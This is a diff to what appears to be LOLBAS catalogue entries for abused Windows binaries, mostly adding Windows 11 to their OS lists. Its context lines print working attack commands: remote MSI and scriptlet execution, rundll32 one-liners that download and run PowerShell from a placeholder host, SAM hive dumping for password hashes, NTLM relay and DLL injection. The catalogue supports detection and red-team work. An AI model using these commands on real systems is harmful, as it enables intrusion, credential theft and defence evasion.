- Command: ilasm.exe C:\public\test.txt /dll
|
||||
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
|
||||
Usecase: A description of the usecase
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: jsc.exe /t:library Library.js
|
||||
Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||
Description: Download and compresses the target file and stores it in the target file.
|
||||
Usecase: Download file and compress into a cab file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.013
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
||||
Usecase: Inject dll file into running process
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msbuild.exe project.csproj
|
||||
Description: Build and execute a C# project stored in the target csproj file.
|
||||
Usecase: Compile and run code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msbuild.exe @sample.rsp
|
||||
Description: Executes Logger statements from rsp file
|
||||
Usecase: Execute DLL
|
||||
@ -31,14 +31,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msbuild.exe project.proj
|
||||
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
|
||||
Usecase: Execute project file that contains XslTransformation tag parameters
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
@ -60,7 +60,7 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.005
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||
Description: Executes VBScript supplied as a command line argument.
|
||||
Usecase: Execute code
|
||||
@ -24,7 +24,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.005
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
Usecase: Execute code hidden in alternate data stream
|
||||
|
@ -10,28 +10,28 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
Description: Installs the target remote & renamed .MSI file silently.
|
||||
Usecase: Execute custom made msi file with attack code from remote server
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msiexec /y "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to un-register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1546.007
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.008
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: odbcconf /a {REGSVR c:\test\test.dll}
|
||||
Description: Execute DllREgisterServer from DLL specified.
|
||||
Usecase: Execute dll file using technique that can evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.008
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||
Detection:
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: pcalua.exe -a \\server\payload.dll
|
||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||
Usecase: Proxy execution of remote dll file
|
||||
@ -24,7 +24,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code_Sample:
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code_Sample:
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
||||
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
||||
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
||||
Usecase: Copy/Download file from remote server
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||
Detection:
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
|
||||
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
|
||||
Usecase: Dump credentials from the Security Account Manager (SAM)
|
||||
Category: Credentials
|
||||
Privileges: Administrator
|
||||
MitreID: T1003.002
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regedit C:\ads\file.txt:regfile.reg
|
||||
Description: Import the target .REG file into the Registry.
|
||||
Usecase: Import hidden registry data from alternate data stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regini.exe
|
||||
- Path: C:\Windows\SysWOW64\regini.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
|
@ -10,28 +10,28 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Download/Copy bar.exe to outdir
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
|
||||
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
|
||||
Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1187
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
|
@ -10,56 +10,56 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
|
||||
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
|
||||
Usecase: Execute DLL from SMB share.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Execute code from alternate data stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
